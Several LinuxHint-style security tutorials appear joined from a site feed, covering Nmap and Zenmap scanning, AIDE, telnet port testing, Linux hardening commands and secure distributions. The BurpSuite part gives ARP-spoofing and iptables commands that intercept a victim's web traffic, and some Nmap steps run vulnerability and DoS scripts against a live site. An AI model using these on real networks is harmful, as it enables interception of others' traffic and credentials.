Completed SYN Stealth Scan at 20:08, 53.62s elapsed (1000 total ports)

Following the port scan, the intense scan will proceed with services and OS discovery:


Initiating Service scan at 20:08
Scanning 4 services on linuxhint.com (64.91.238.144)
Completed Service scan at 20:09, 13.25s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against linuxhint.com (64.91.238.144)
adjust_timeouts2: packet supposedly had rtt of -88215 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -88215 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -82678 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -82678 microseconds.  Ignoring time.
Retrying OS detection (try #2) against linuxhint.com (64.91.238.144)

A traceroute is then executed to print the network topology, or the hops between us and our target; it reported 11 hosts, as you can see below. More information will be available in the Topology tab.


Initiating Traceroute at 20:09
Completed Traceroute at 20:09, 3.02s elapsed
Initiating Parallel DNS resolution of 11 hosts. at 20:09
Completed Parallel DNS resolution of 11 hosts. at 20:09, 0.53s elapsed

Once the scan process ends, post scan scripts will be executed:


NSE: Script scanning 64.91.238.144.
Initiating NSE at 20:09
Completed NSE at 20:09, 11.02s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 5.22s elapsed

And finally you will have the report output for each step.
The first part of the report focuses on ports and services, showing that the host is up, the number of closed ports which aren’t shown, and detailed information on open or filtered ports:


Nmap scan report for linuxhint.com (64.91.238.144)
Host is up (0.21s latency).
Not shown: 978 closed ports
PORT           STATE         SERVICE      VERSION
22/tcp   open  ssh  OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 05:44:ab:4e:4e:9a:65:e5:f2:f4:e3:ff:f0:7c:37:fe (DSA)
|   2048 10:2f:75:a8:49:58:3e:44:21:fc:46:32:07:1d:3d:78 (RSA)
|   256 a3:d5:b9:2e:e4:49:06:84:b4:bb:e6:32:54:73:72:49 (ECDSA)
|_  256 21:ab:6c:2c:76:b7:5c:f4:0f:59:5c:a7:ab:ed:d5:5c (ED25519)
25/tcp   open          smtp            Postfix smtpd

|_smtp-commands: zk153f8d-liquidwebsites.com, PIPELINING, SIZE 10240000, ETRN, STARTTLS,
 ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_smtp-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: TLS randomness does not represent time
80/tcp   open          http              nginx
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx
|_http-title: Did not follow redirect to https://linuxhint.com/
161/tcp  filtered snmp
443/tcp  open         ssl/http        nginx
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-generator: WordPress 5.3.2
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx
|_http-title: Linux Hint – Exploring and Master Linux Ecosystem
|_http-trane-info: Problem with XML parsing of /evox/abou
| ssl-cert: Subject: commonName=linuxhint.com
| Subject Alternative Name: DNS:linuxhint.com, DNS:www.linuxhint.com
| Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-11-30T11:25:40
| Not valid after:  2020-02-28T11:25:40
| MD5:   56a6 1899 0a73 c79e 2db1 b407 53a6 79ec
|_SHA-1: a6b4 fcf9 67c2 4440 6f86 7aab 7c88 2608 674a 0303
1666/tcp filtered netview-aix-6
2000/tcp filtered cisco-sccp
2001/tcp filtered dc
2002/tcp filtered globe
2003/tcp filtered finger
2004/tcp filtered mailbox
2005/tcp filtered deslogin
2006/tcp filtered invokator
2007/tcp filtered dectalk
2008/tcp filtered conf
2009/tcp filtered news
2010/tcp filtered search
6666/tcp filtered irc
6667/tcp filtered irc
6668/tcp filtered irc
6669/tcp filtered irc
9100/tcp filtered jetdirect

The following part of the report focuses on the OS detection:


Device type: general purpose|WAP
Running (JUST GUESSING): Linux 3.X|4.X (88%), Asus embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel
 cpe:/h:asus:rt-ac66u
Aggressive OS guesses: Linux 3.10 - 4.11 (88%), Linux 3.13 (88%), Linux 3.13 or 4.2 (88%), 
Linux 4.2 (88%), Linux 4.4 (88%), Linux 3.18 (87%), Linux 3.16 (86%), Linux 3.16 - 4.6 (86%),
Linux 3.12 (85%), Linux 3.2 - 4.9 (85%)

No exact OS matches for host (test conditions non-ideal).

The next part shows uptime, the total hops between you and the target and the final host detailing response time information on each hop.


Uptime guess: 145.540 days (since Fri Sep  6 07:11:33 2019)
Network Distance: 12 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host:  zk153f8d-liquidwebsites.com; OS: Linux; CPE: cpe:/o:linux:linux_kernel
 

TRACEROUTE (using port 256/tcp)
HOP RTT     ADDRESS
1   47.60 ms  192.168.0.1
2   48.39 ms  10.22.22.1
3   133.21 ms host-1-242-7-190.ipnext.net.ar (190.7.242.1)
4   41.48 ms  host-17-234-7-190.ipnext.net.ar (190.7.234.17)
5   42.99 ms  static.25.229.111.190.cps.com.ar (190.111.229.25)
6   168.06 ms mai-b1-link.telia.net (62.115.177.138)
7   186.50 ms level3-ic-319172-mai-b1.c.telia.net (213.248.84.81)
8   ...
9   168.40 ms 4.14.99.142
10  247.71 ms 209.59.157.114
11  217.57 ms lw-dc3-storm2.rtr.liquidweb.com (69.167.128.145)
12  217.88 ms 64.91.238.144

Finally, the post-scan script execution is reported:


NSE: Script Post-scanning.
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results
at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.19 seconds
Raw packets sent: 2272 (104.076KB) | Rcvd: 2429 (138.601KB)

Now let’s test the Intense scan plus UDP, which you can select from the Profile drop-down menu:

With the Intense scan plus UDP you’ll see the flags -sS, -sU, -T4, -A and -v.
As said before, -T4 refers to the timing template and -A enables OS and version detection, NSE scripts and traceroute, while:

-sS: enables SYN scan.

-sU: enables UDP scan.

An UDP scan may lead us to interesting discoveries in widely used services such as DNS, SNMP or DHCP.
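The equivalent terminal command for this profile would be (example target only; SYN and UDP scans require root privileges):

# sudo nmap -sS -sU -T4 -A -v linuxhint.com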

To end this tutorial let’s see the Intense scan, all TCP ports.

This scan adds the flag -p to specify a port range; in this case the range is -p 1-65535, covering all existing TCP ports:
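From the terminal, the same profile corresponds to (example target only):

# nmap -p 1-65535 -T4 -A -v linuxhint.com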

You can see the output including open and filtered ports on the Ports / Hosts tab:

I hope you found this tutorial on Zenmap useful, keep following LinuxHint for more tips and updates on Linux and networking.

]]>
Setup And Configure Debian Linux Install Advanced Intrusion Detection Environment https://linuxhint.com/debian_linux_advanced_instrusion_detection_env/ Thu, 06 Feb 2020 18:29:25 +0000 https://linuxhint.com/?p=54732 Advanced Intrusion Detection Environment (AIDE) is another method to detect anomalies within the system. AIDE must not be confused with more widely known Intrusion Detection Systems such as OSSEC or Snort, which, in order to detect attacks or security events, analyze the traffic looking for anomalous packets.

Contrary to these Intrusion Detection Systems (usually referred to as IDS), Advanced Intrusion Detection Environment (known as AIDE) checks file integrity by comparing system file information and attributes with an initially created database.

First it creates a database of the healthy system, against which it later compares integrity using the algorithms sha1, rmd160, tiger, crc32, sha256, sha512 and whirlpool, with optional support for gost, haval and crc32b. Of course, AIDE supports remote monitoring.

Together with file contents, AIDE checks file attributes such as file type, permissions, GID, UID, size, link name, block count, number of links, mtime, ctime and atime, as well as attributes provided by XAttrs, SELinux, POSIX ACLs and extended attributes. With AIDE it is possible to specify files and directories to be excluded from or included in monitoring tasks.

Setup and configure: Install Advanced Intrusion Detection Environment on Debian

To start, install AIDE on Debian and derived Linux distributions by running:

# apt install aide-common -y

After installing AIDE, the first step is to create a database of your healthy system, which will later be contrasted with snapshots to verify file integrity.

To build the initial database run:

# sudo aideinit

Note: if you had a previous database AIDE will overwrite it (after asking for confirmation); it is recommended to do a verification before proceeding.

This process may take several minutes before showing the output you can see below.

As you can see, the database was generated at /var/lib/aide/aide.db.new; within the directory /var/lib/aide/ you’ll also see a file called aide.db. To run an integrity check against that database, execute:

# aide.wrapper -c /etc/aide/aide.conf --check

If the return code is 0, AIDE did not find problems. When the flag --check is applied, the possible return codes mean:

1 = New files were found in the system.
2 = Files were removed from the system.
4 = Files in the system suffered changes.
14 = Error writing output.
15 = Invalid argument error.
16 = Unimplemented function error.
17 = Invalid configuration line error.
18 = I/O error.
19 = Version mismatch error.
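Note that the change-related codes add up when several conditions occur at once (for example, 7 means new, removed and changed files were all detected). As a minimal sketch, these return codes can be checked from a script or cron job; the mail command used here is an assumption and can be replaced by any notification mechanism you prefer:

#! /bin/bash
# Run the AIDE check and react to its return code (Debian default paths assumed)
aide.wrapper -c /etc/aide/aide.conf --check
status=$?
if [ "$status" -eq 0 ]; then
    echo "AIDE: no changes detected"
elif [ "$status" -le 7 ]; then
    echo "AIDE: filesystem changes detected (code $status)" | mail -s "AIDE alert" root
else
    echo "AIDE: error while running the check (code $status)" >&2
fi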

AIDE options and parameters include:

--init or -i: this option initializes the database; it is a mandatory step prior to any check, since checks won’t work if the database wasn’t initialized first.

--check or -C: when this option is applied, AIDE compares the system files with the database information. This is the default action when AIDE is executed without options.

--update or -u: this option is used to update the database.

--compare: this option is used to compare different databases; the databases must be previously defined in the configuration file.

--config-check or -D: this option is useful to find errors in the configuration file; with it AIDE will only read the configuration without continuing to check files.

--config or -c: this parameter is useful to specify a configuration file other than aide.conf.

--before or -B: add configuration parameters before reading the configuration file.

--after or -A: add configuration parameters after reading the configuration file.

--verbose or -V: with this option you can specify the verbosity level, which can be defined between 0 and 255.

--report or -r: with this option you can send AIDE’s report to another destination; you can repeat this option to instruct AIDE to send reports to different destinations.

You can get additional information on these and more AIDE commands and options in the man page.

AIDE Configuration File:

AIDE’s configuration is done in the configuration file (located at /etc/aide/aide.conf on Debian), where you can define AIDE’s behavior. Below, some of the most popular options are explained, followed by a minimal example after the list.

The directives in the configuration file include, among other functionalities:

database_out: here you can specify the new db location. While you can define several destinations when launching the command, in this configuration file you can set only one url.

database_new: source db url when comparing databases.

database_attrs: Checksum

database_add_metadata: add additional information as comments such as db time creation,etc.

verbose: here you can input a value between 0 and 255 to define the verbosity level.

report_url: url defining output location.

report_quiet: skips output if no differences were found.

gzip_dbout: here you can define if the db should be compressed (depends on zlib).

warn_dead_symlinks: define if dead symlinks should be reported or not.

grouped: group files which reportedly suffered changes.
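A minimal illustrative excerpt follows; the values, paths and monitored directories are examples only and should be adapted to your own /etc/aide/aide.conf:

# Illustrative /etc/aide/aide.conf directives (example values)
database=file:/var/lib/aide/aide.db
database_out=file:/var/lib/aide/aide.db.new
gzip_dbout=yes
verbose=5
report_url=file:/var/log/aide/aide.log
# Selection line: monitor /etc checking permissions, owner, group and sha256 checksums
/etc p+u+g+sha256
# Exclude a frequently changing directory
!/var/log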

More instructions on the configuration file options are available at https://linux.die.net/man/5/aide.conf.

I hope you found this article on setting up and configuring the Advanced Intrusion Detection Environment on Debian Linux useful. Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
Telnet to a Specific Port for Testing Purposes https://linuxhint.com/telnet_specific_port/ Thu, 06 Feb 2020 18:25:08 +0000 https://linuxhint.com/?p=54743 Telnet is both a protocol allowing us to access a remote device in order to control it and the program used to connect through this protocol. The Telnet protocol is the “cheap” version of SSH: unencrypted and vulnerable to sniffing and Man-in-the-Middle attacks; by default the Telnet port should be closed.

The telnet program (as opposed to the Telnet protocol) can be useful to test port states, which is the functionality this tutorial explains. The reason why this program can also connect to services using other protocols, such as POP, is that those protocols also work over plain text (which is their main problem and why such services should not be used).

Checking ports before starting:

Before starting with telnet, let’s check with Nmap some ports on the sample target (linuxhint.com).

# nmap linuxhint.com

Getting started with Telnet to specific ports for testing purposes:

Once we have learned which ports are open, we can start launching tests. Let’s try port 22 (ssh); on the console write “telnet <target> <port>” as shown below:

# telnet linuxhint.com 22

As you can see in the example below the output says I’m connected to linuxhint.com, therefore the port is open.

Let’s try the same on the port 80 (http):

# telnet linuxhint.com 80

The output is similar for port 80; now let’s try port 161, which according to Nmap is filtered:

# telnet linuxhint.com 161

As you can see, the filtered port didn’t allow the connection to be established, returning a timeout error.

Now let’s try Telnet against a closed (not filtered) port; for this example I will use port 81. Since Nmap didn’t report closed ports individually, before proceeding I will confirm it is closed by scanning the specific port using the -p flag:

# nmap -p 81 linuxhint.com

Once confirmed the port is closed, let’s test it with Telnet:

# telnet linuxhint.com 81

As you can see, the connection wasn’t established and the error is different from the filtered port’s, showing “Connection refused”.

To close an established connection, you can press CTRL+] and you will see the prompt:

telnet>

Then type “quit” and press ENTER.

Under Linux you can easily write a little shell script to connect through telnet with different targets and ports.

Open nano and create a file called multipletelnet.sh with the following content inside:


#! /bin/bash
# The first telnet command connects to linuxhint.com through port 80 (http).
telnet linuxhint.com 80
# The second telnet command connects to linux.lat through port 22 (ssh).
telnet linux.lat 22
# The third telnet command connects to linuxhint.com through port 22 (ssh).
telnet linuxhint.com 22

Each connection only starts after the previous one was closed; you can close a connection by sending any character. In the example above I passed “q”.

Yet, if you want to test many ports and targets simultaneously, Telnet isn’t the best option; for that you have Nmap and similar tools.
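For example, a single Nmap command can check the same ports tested by the script above on both hosts at once:

# nmap -p 22,80 linuxhint.com linux.lat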

About Telnet:

As said before, Telnet is an unencrypted protocol vulnerable to sniffers; any attacker can intercept the communication between the client and the server in plain text, accessing sensitive information such as passwords.

The lack of strong authentication also allows possible attackers to modify the packets sent between two nodes.

Because of this Telnet was rapidly replaced by SSH (Secure Shell) which provides a variety of authentication methods and also encrypts the whole communication between nodes.

Bonus: testing specific ports for possible vulnerabilities with Nmap:

With Nmap we can go much further than with Telnet: we can learn the version of the program running behind the port and we can even test it for vulnerabilities.

Scanning a specific port to find vulnerabilities on the service:

The following example shows a scan against port 80 of linuxhint.com calling the Nmap NSE script category vuln to run scripts looking for vulnerabilities:

# nmap -v -p 80 --script vuln linuxhint.com

As you can see, since it is LinuxHint.com server no vulnerabilities were found.

It is possible to scan a specific port for a specific vulnerability; the following example shows how to scan a port using Nmap to find DOS vulnerabilities:

# nmap -v -p 80 --script dos linuxhint.com

As you can see Nmap found a possible vulnerability (it was a false positive in this case).

You can find a lot of high quality tutorials with different port scanning techniques at https://linuxhint.com/?s=scan+ports.

I hope you found this tutorial on Telnet to a specific port for testing purposes useful. Keep following LinuxHint for more tips and updates on Linux and networking ]]> List of essential Linux security commands https://linuxhint.com/list_essential_linux_security_commands/ Thu, 06 Feb 2020 18:20:22 +0000 https://linuxhint.com/?p=54767 This tutorial shows some of the most basic Linux commands oriented to security.

Using the command netstat to find open ports:

One of the most basic commands to monitor the state of your device is netstat which shows the open ports and established connections.

Below is an example of netstat output with additional options:

# netstat -anp

Where:
-a: shows all sockets, listening and non-listening.
-n: shows IP addresses instead of hostnames.
-p: shows the program establishing the connection.

For a better look, here is an output extract:

The first column shows the protocol; you can see both TCP and UDP are included, and the first screenshot also shows UNIX sockets. If you suspect something is wrong, checking ports is of course mandatory.
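A quick way to focus only on listening TCP services (a common first check) is to filter the output, for example:

# netstat -tlnp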

Setting basic rules with UFW:

LinuxHint has published great tutorials on UFW and Iptables; here I will focus on a restrictive-policy firewall. It is recommended to keep a restrictive policy denying all incoming traffic unless you explicitly allow it.

To install UFW run:

# apt install ufw

To enable the firewall at startup run:

# sudo ufw enable

Then apply a default restrictive policy by running:

#  sudo ufw default deny incoming

You will need to manually open the ports you want to use by running:

# ufw allow <port>
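For example, to keep remote SSH access reachable while everything else stays blocked, and then review the active rules:

# sudo ufw allow 22/tcp
# sudo ufw status verbose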

Auditing yourself with nmap:

Nmap is, if not the best, one of the best security scanners on the market. It is the main tool used by sysadmins to audit their network security. If you are in a DMZ you can scan your external IP; you can also scan your router or your localhost.

A very simple scan against your localhost would be:

# nmap localhost

As you can see, the output shows that my port 25 and port 8084 are open.

Nmap has a lot of possibilities, including OS, Version detection, vulnerability scans, etc.
At LinuxHint we have published a lot of tutorials focused on Nmap and its different techniques. You can find them here.

The command chkrootkit to check your system for rootkit infections:

Rootkits are probably the most dangerous threat to computers. The command chkrootkit (check rootkit) can help you to detect known rootkits.

To install chkrootkit run:

# apt install chkrootkit

Then run:

# sudo chkrootkit

Using the command top to check processes taking most of your resources:

To get a fast view of running processes and the resources they consume, you can use the command top; on the terminal run:

# top

The command iftop to monitor your network traffic:

Another great tool to monitor your traffic is iftop; run it specifying the network interface to watch:

# sudo iftop <interface>

In my case:

# sudo iftop wlp3s0

The command lsof (list open files) to check the association between files and processes:

If you suspect something is wrong, the command lsof can list the open files and the processes they are associated with; on the console run:

# lsof

The commands who and w to know who is logged into your device:

Additionally to knowing how to defend your system, it is mandatory to know how to react when you suspect your system has been hacked. One of the first commands to run in such a situation is w or who, which will show which users are logged into your system and through which terminal. Let’s begin with the command w:

# w

Note: commands “w” and “who” may not show users logged from pseudo terminals like Xfce terminal or MATE terminal.

The column called USER displays the username; the screenshot above shows the only user logged in is linuxhint. The column TTY shows the terminal (tty7), and the third column, FROM, displays the user’s address; in this scenario there are no remote users logged in, but if there were you could see IP addresses there. The LOGIN@ column specifies the time at which the user logged in, the JCPU column summarizes the CPU time of processes executed in the terminal or TTY, and PCPU displays the CPU time used by the process listed in the last column, WHAT.

While w is equivalent to executing uptime, who and ps -a together, another alternative, despite giving less information, is the command “who”:

# who

The command last to check the login activity:

Another way to supervise users’ activity is through the command “last”, which reads the file wtmp containing information on login access, login source and login time, with options to narrow down specific login events. To try it run:

# last

Checking your SELinux status and enable it if needed:

SELinux is a restriction (mandatory access control) system which improves the security of any Linux system; it comes by default on some Linux distributions and is widely explained here on LinuxHint.

You can check your SELinux status by running:

# sestatus

If you get a command not found error, you can install SELinux by running:

# apt install selinux-basics selinux-policy-default -y

Then run:

# selinux-activate

Check any user activity using the command history:

At any time, you can check a user’s activity (if you are root) by using the command history while logged in as the user you want to monitor:

# history

The command history reads the file .bash_history of each user. Of course, this file can be tampered with, and as root you can also read the file directly without invoking the command history. Yet, if you want to monitor activity, running it is the recommended way.
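As a sketch of that last point (assuming the default Bash history location), root can inspect a user’s history file directly:

# cat /home/<user>/.bash_history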

I hope you found this article on essential Linux security commands useful. Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
BurpSuite Tutorial for Beginners https://linuxhint.com/burpsuite_tutorial_beginners/ Wed, 05 Feb 2020 12:20:20 +0000 https://linuxhint.com/?p=54620 BurpSuite is a collection of tools to carry out pen testing or security auditing.  This tutorial focuses on the Community version, the free one, which features Proxy, Intruder, Repeater, Sequencer, Comparer, Extender and Decoder tools.

This tutorial shows how to install BurpSuite on Debian, how to set up your browser (in this tutorial I only show how to set it up on Firefox) and the SSL certificate, and how to capture packets without previous proxy configuration on the target by combining BurpSuite with arpspoof and configuring an invisible proxy listener.

To begin installing BurpSuite, visit the PortSwigger Burp Suite download page and select the Get Community option (the third one) to get BurpSuite for free.

In the next screen click on “Download the latest version” orange button to continue.

Click on the green Download button.

Save the .sh script and give it execution permissions by running:

# chmod +x <package.sh>

In this case for the current version at this date I run:

# chmod +x burpsuite_community_linux_v2020_1.sh

Once execution rights are given, run the script:

# ./burpsuite_community_linux_v2020_1.sh

A GUI installer will appear; press “Next” to continue.

Leave the default installation directory (/opt/BurpSuiteCommunity) unless you need a different location and press Next to continue.

Keep “Create Symlink” selected and leave the default directory, then press Next.

The installation process will start:

Once the process ends click on Finish.

From your X Window manager’s applications menu select BurpSuite; in my case it was located in the category “Other”.

Decide if you wish to share your BurpSuite experience or not, click I Decline, or I Accept to continue.

Leave Temporary Project and press Next.

Leave Use Burp defaults and press Start Burp to launch the program.

You’ll see BurpSuite main screen:

Before proceeding, open firefox and open http://burp.

A screen similar to the one shown below will appear; in the upper right corner click on CA Certificate.

Download and save the certificate.

On the Firefox menu click on Preferences, then click on Privacy and Security and scroll down until you find the Certificates section, then click on View Certificates as shown below:

Click on Import:

Select the certificate you got previously and press Open:

Click on “Trust this CA to identify websites.” and press OK.

Now, still on the Firefox Preferences menu click on General in the menu located in the left side and scroll down until reaching Network Settings, then click on Settings.

Select Manual Proxy Configuration, in the HTTP Proxy field set the IP 127.0.0.1 and port 8080 (Burp’s default proxy port), checkmark “Use this proxy server for all protocols”, then click OK.

Now BurpSuite is ready to show how it can intercept traffic when defined as a proxy. In BurpSuite click on the Proxy tab and then on the Intercept sub-tab, making sure intercept is on, and visit any website from your Firefox browser.

The request between the browser and the visited website will go through Burpsuite, allowing you to modify the packets as in a Man in the Middle attack.

The example above is the classic proxy feature demonstration for beginners. Yet, you can’t always configure the target’s proxy settings; if you could, a keylogger would probably be more helpful than a Man-in-the-Middle attack.

Now we will use ARP spoofing and the invisible proxy feature to capture traffic from a system on which we can’t configure the proxy.

To begin, install arpspoof (on Debian and Debian-based Linux systems you can install it through apt install dsniff). Once dsniff with arpspoof is installed, to capture packets going from the target to the router, on the console run:

# sudo arpspoof -i <Interface-Device> -t <Target-IP> <Router-IP>

Then to capture packets from the router to the target run in a second terminal:

# sudo arpspoof -i <Interface-Device> -t  <Router-IP> <Target-IP>

To prevent blocking the victim enable IP forwarding:

# echo 1 > /proc/sys/net/ipv4/ip_forward

Redirect all traffic to port 80 and 443 to your device using iptables by running the commands below:

# sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.43.38
# sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.43.38
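In the rules above, 192.168.43.38 is the attacking machine’s own LAN address; as a quick sketch, you can confirm yours before writing the rules:

# ip addr show <Interface-Device>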

Run BurpSuite as root, otherwise some steps like enabling new proxies on specific ports won’t work:

# java -jar -Xmx4g /opt/BurpSuiteCommunity/burpsuite_community.jar

If the following warning appears press OK to continue.

Once BurpSuite is open, click on Proxy>Options and click on the Add button.

Set the port to 80 and under Specific address select your local network IP address:

Then click on Request handling tab, checkmark Support Invisible proxying (enable only if needed) and press OK.

Repeat the steps above now with port 443, click on Add.

Set the port 443 and again select your local network IP address.

Click on Request Handling, checkmark support for invisible proxying and press OK.

Mark all proxies as running and as invisible.

Now from the target device visit a website, the Intercept tab will show the capture:

As you can see you managed to capture packets without previous proxy configuration on the target’s browser.

I hope you found this tutorial on BurpSuite useful. Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
Nmap Version Scan, determining the version and available services https://linuxhint.com/nmap_version_scan/ Wed, 05 Feb 2020 12:13:49 +0000 https://linuxhint.com/?p=54690 The action of collecting as much information as possible about a target is usually called “footprinting” by IT specialists. While by default Nmap scans ports looking for available services, it is possible to force the scan to try to detect the software versions running on the target, increasing the footprinting accuracy.

One reason why it is so important to detect services and software versions on the target device is that some services share the same ports; therefore, in order to discriminate between services, detecting the software running behind the port may become critical.

Yet, the main reason most sysadmins will run a version scan is to detect security holes or vulnerabilities belonging to outdated or specific software versions.

A regular Nmap scan can reveal open ports; by default it won’t show you the software behind them. You may see port 80 open, yet you may need to know whether Apache, Nginx or IIS is listening.

By adding version detection NSE (Nmap Scripting Engine) can also contrast the identified software with vulnerabilities databases (see “How to use Vuls”).

How does Nmap service and version detection work?

In order to detect services Nmap uses a database called nmap-services, which maps probable services to ports; the list can be found at https://svn.nmap.org/nmap/nmap-services. If you have a customized port configuration you can edit the file located at /usr/share/nmap/nmap-services. To enable service and version detection the flag -sV is used (the flag -A also enables it, together with OS detection, NSE and traceroute).
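As a quick illustration (assuming the Debian path mentioned above), you can see which service name Nmap associates with a given port by querying that database directly:

# grep -w 443/tcp /usr/share/nmap/nmap-services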

To detect software versions Nmap has another database called nmap-service-probes which includes probes for querying and match expressions to identify responses.

Both databases help Nmap first to detect the service behind the port such as ssh or http. Second, Nmap will try to find the software providing the service (such as OpenSSH for ssh or Nginx or Apache for http) and the specific version number.

In order to increase version detection accuracy, this specific scan integrates NSE (Nmap Scripting Engine) to launch scripts against suspected services to confirm or discard detections.

You can always regulate the intensity of the scan, as will be explained below, although it will only be useful against uncommon services on targets.

Getting started with Nmap Services and Version Detection:

To install Nmap on Debian and based Linux distributions run:

# apt install nmap -y

Before starting lets run a regular Nmap scan by executing:

# nmap linuxhint.com

You can see open and filtered ports are listed; now let’s run a version scan by executing:

# nmap -sV linuxhint.com

You can see in the output above this time Nmap detected OpenSSH 6.6.1p1 behind port 22, Postfix behind port 25 and Nginx behind ports 80 and 443. In some cases, Nmap cannot distinguish filtered ports, in such cases Nmap will mark them as filtered, yet if instructed it will continue probes against these ports.

It is possible to determine the degree of intensity Nmap will use to detect software versions; by default the level is 7 and the possible range is from 0 to 9. This feature will only show different results if uncommon services are running on the target; there will be no differences on servers with widely used services. The following example shows a version scan with minimal intensity:

#  nmap -sV --version-intensity 0 linuxhint.com

To run the most aggressive version detection scan, replace the 0 for 9:

# nmap -sV --version-intensity 9 linuxhint.com

The level 9 can be also executed as:

# nmap -sV --version-all nic.ar

For a low intensity version detection (2) you can use:

#  nmap -sV --version-light  nic.ar

You can instruct Nmap to show the whole process by adding the --version-trace option:

# nmap -sV  --version-trace 192.168.43.1

Now, let’s use the flag -A which also enables version detection, additionally to OS, traceroute and NSE:

# nmap -A 192.168.0.1

As you can see, after the scan the NSE post-scan was launched, detecting possible vulnerabilities for the exposed BIND version.

The device type and OS were successfully detected as phone and Android and a traceroute was also executed (the Android mobile is working as hotspot).

While NSE is integrated into service detection to allow better accuracy, a specific OS detection scan can be launched with the -O flag, as in the following example:

# nmap -O 192.168.43.1

As you can see, the result was pretty similar without NSE, which by default is integrated into version probes.

As you can see, with Nmap and a few commands you’ll be able to learn relevant information about the software running on targets; if the flag -A is enabled, Nmap will test the results trying to find security holes for the detected service versions.

I hope you found this tutorial on Nmap Version Scan useful, there are a lot of additional high quality content on Nmap at https://linuxhint.com/?s=nmap.

Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
Most secure Linux distros https://linuxhint.com/most_secure_linux_distros/ Tue, 04 Feb 2020 18:43:54 +0000 https://linuxhint.com/?p=54563 This article focuses on some of the most secure Linux distros, including Qubes OS, Tails, Alpine Linux, Whonix and IprediaOS, plus a shared review of offensive security distributions, including Kali Linux, BlackArch and Parrot OS, which are the best options for pentesting yourself.

Some of the Linux distributions mentioned below are optimized to prevent hacker attacks while others fit better if you want to prevent forensics against your devices.

Offensive security Linux distributions are also a good option when looking for a safe OS, and some were included in this list.

Qubes OS

Qubes OS uses the bare-metal (type 1) hypervisor Xen. It offers isolated virtualization of systems (domains) based on different Linux distributions and even Windows. It is free and open source and leads the market as the most, or among the most, secure solutions featuring Linux (operating systems like OpenBSD are excluded from this article).

Qubes OS divides or isolates different domains (virtual machines), each for a different purpose; in case one of the virtual machines gets hacked, the rest remain safe. Each domain, qube or compartment has a different security level depending on the activity the user develops in it; for example, you can have a virtual machine, compartment or qube to manage your Bitcoin wallet, a different qube for work, a different one for undefined tasks, etc. Qubes OS shows all qubes or compartments on a single screen, and each qube is identified by a color associated with its security level.

Qubes OS is a free and open-source security-oriented operating system meant for single-user desktop computing.

And Qubes OS has an official endorsement from Edward Snowden, who tweeted: “If you’re serious about security, @QubesOS is the best OS available today. It’s what I use, and free. Nobody does VM isolation better.” You can get Qubes OS for free at https://www.qubes-os.org/.

Tails (The Amnesic Incognito Live System):

Tails is a live Debian based Linux distribution considered among the most secure distributions together with the previously mentioned QubeOS.

Tails can be considered an anti-forensic Linux distribution which doesn’t leave traces of activity; in order to help achieve this, Tails forces all network traffic through the Tor anonymity network.

Among the tools included in Tails you can find Tor for anonymous browsing, pidgin for encrypted communication (messengers), Claws Mail for encrypted emails, Liferea, Aircrack-ng to audit wireless network connections, I2P for safe connections, Electrum to manage bitcoins, LUKS to encrypt devices, GnuPG to encrypt files, Monkeysign, PWGen, KeepPassX to manage passwords, MAT, GTkHash for checksums, Keyringer  and Paperkey to save PGP keys and more.

To prevent forensics, even when used as a live CD, Tails overwrites memory to remove all traces of activity recoverable by forensic tools. Optionally, Tails allows you to set up persistent storage on an encrypted storage device.

Tails, based on Debian, is the successor of Incognito, a widely used Gentoo-based Linux distribution used to browse anonymously.

You can download Tails for free from its official website at https://tails.boum.org/.

Alpine Linux

Alpine Linux aims to be a small, simple and secure Linux distribution. Thanks to these three main features, it can be installed on storage devices with as little as 130 MB of capacity. Alpine Linux features its own package manager (apk) and additional software from its repositories. Userland binaries in Alpine Linux are compiled as position-independent executables (PIE), allowing executables to be loaded at random locations in memory. Alpine Linux can be obtained for free from its official website at https://alpinelinux.org/.

IprediaOS

IprediaOS is a fast and secure OS based on Fedora Linux. It provides an anonymous environment for browsing, mailing, chatting and sharing files. IprediaOS features the Robert BitTorrent client, ready to share files anonymously through I2P, Wireshark, SELinux, an anonymous browser and XChat to communicate anonymously through I2P; it also includes an anonymous mail service (Susimail).

IprediaOS can be downloaded for free from https://www.ipredia.org/.

Whonix

Whonix is another secure Linux solution based on Debian. Whonix is made up of 2 different virtualized machines: the workstation where the user works and a gateway. The workstation can’t reach the network without passing through the gateway, which sits between the workstation and the Tor network. Whonix can run on VirtualBox, KVM or the previously mentioned Qubes OS.

Contrary to Qubes OS, Whonix remembers Tor nodes, preventing new attackers from impersonating nodes to carry out MitM attacks. Whonix was designed to provide security and anonymize users; in fact the project has the tagline “Anonymize Everything You Do Online”. It can be downloaded for free from its official website at https://www.whonix.org/.

Safe offensive Linux distributions:

Because this article focuses on secure Linux distributions, distributions oriented to hacking must be included for a variety of reasons.

